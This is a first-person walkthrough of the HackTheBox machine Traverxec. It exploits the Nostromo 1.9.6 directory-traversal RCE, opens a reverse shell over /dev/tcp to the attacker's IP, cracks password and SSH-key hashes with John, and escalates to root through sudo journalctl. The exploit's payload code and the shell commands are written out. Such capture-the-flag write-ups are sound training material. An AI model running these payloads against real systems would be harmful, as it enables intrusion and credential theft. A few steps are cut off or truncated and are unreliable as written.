HackTheBox — Traverxec Writeup

This is my first write up for a HackTheBox Machine, it’s Traverxec.

Let’s start with scanning it. I do have my readymade script which first scan for all open ports, then do a service enumeration and other stuff on the opened ports.

Here is the scanning bash script:

#!/bin/bash
echo Grabbing ports...
ports=$(nmap -p- --min-rate  1000 -v -T4 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)  
echo Ports grabbed!
echo Scanning...
nmap -sC -v -sV -Pn -p $ports $1 $2 $3

Now i will run the below command:

portScanner.sh traverxec.htb

let’s check the scanning results

i found that we have only 2 ports:

• SSH → (22/tcp)
• Web → (80/tcp): this service has Nostromo web server running on it with version 1.9.6.

the first thing came to my head is to search for any known exploits for it, i used Searchsploit for this:

searchsploit "nostromo 1.9.6"

Searchsploit

it seems that i was lucky enough to find out a Remote Code Execution by first hit.

Let’s copy the exploit to current directory then use it.

cp /usr/share/exploitdb/exploits/multiple/remote/47837.py Exploit.py

i copied it and named it Exploit.py

I read the script of the exploit and find out that Nostromo web server is affected by RCE as result of Directory Traversal in the function http_verify in nostromo nhttpd through version 1.9.6 allows to get RCE via a crafted HTTP request.

CVE-2019–16278

Now let’s see what is required to run the python exploit script.

So i found the below function:

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload)
    receive = connect(soc)
    print(receive)

which sends a crafted payload to call /bin/sh and send the cmd user argument to it to be executed on the server, then receive the results and print it.

i run the script to show the help:

So, it will only need to pass the Target IP , Target Port and Command

python Exploit.py 10.10.10.165 80 whoami

Now i will manage to get a reverse shell to my machine, Thank to Pentestmonkey for the cheat sheet.

First will create a netcat listener on port 8090

nc -nvlp 8090

and in another teminal will execute the exploit again to get the reverse shell:

python Exploit.py 10.10.10.165 80 "bash -i >& /dev/tcp/10.10.16.40/8090 0>&"

now i got a reverse shell

now let’s get the users on the system

cat /etc/passwd

Now let’s filter only users with bash profile

cat /etc/passwd | grep -i "/bin/bash"

Now let’s spawn a tty shell.

python -c 'import pty; pty.spawn("/bin/sh")'

Now i will upload LinEnum Script to the target system to get more enumeration.

I already downloaded it and uploaded it to my web server, so i will just to go /tmp in the target machine to upload in it, as i found that i have the permission to write files to it.

Let’s change the permission on the Script to be able to use it

I run the script

./LinEnum.sh

the most interesting part from the finding is that i could find a hashed password in htpasswd file

I copied it into file called hash.txt, then i used JohnTheRipper to get the password in clear text using rockyou wordlist

john hash.txt --wordlists=/usr/share/wordlists/rockyou.txt

i tried to login through SSH using david credentials, but i could not, so i decided to check if i can find any other config files related to Nostromo which may find any other clues.

I found an accessible directory called public_www in nostromo home directory as per he is the Server Admin.

i unzipped backup-ssh-identity-files.tgz to /tmp

now let’s decrypt the SSH key using John

now let’s change the permission of the SSH key id_rsa to 600 to disallow anyone except the owner of accessing it, then let’s access the target using it in addition to the cracked hunter

I explored bin directory to find

I searched about journalctl to use it for privilege escalation as i found it run in the script using sudo.

It seems that the day was mine, as i found the answer in first link from google search Gtfobins just told me that it can be used to break out from restricted environments by spawning an interactive shell. after some search i realized that after firing the command i have to minimize the terminal window

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service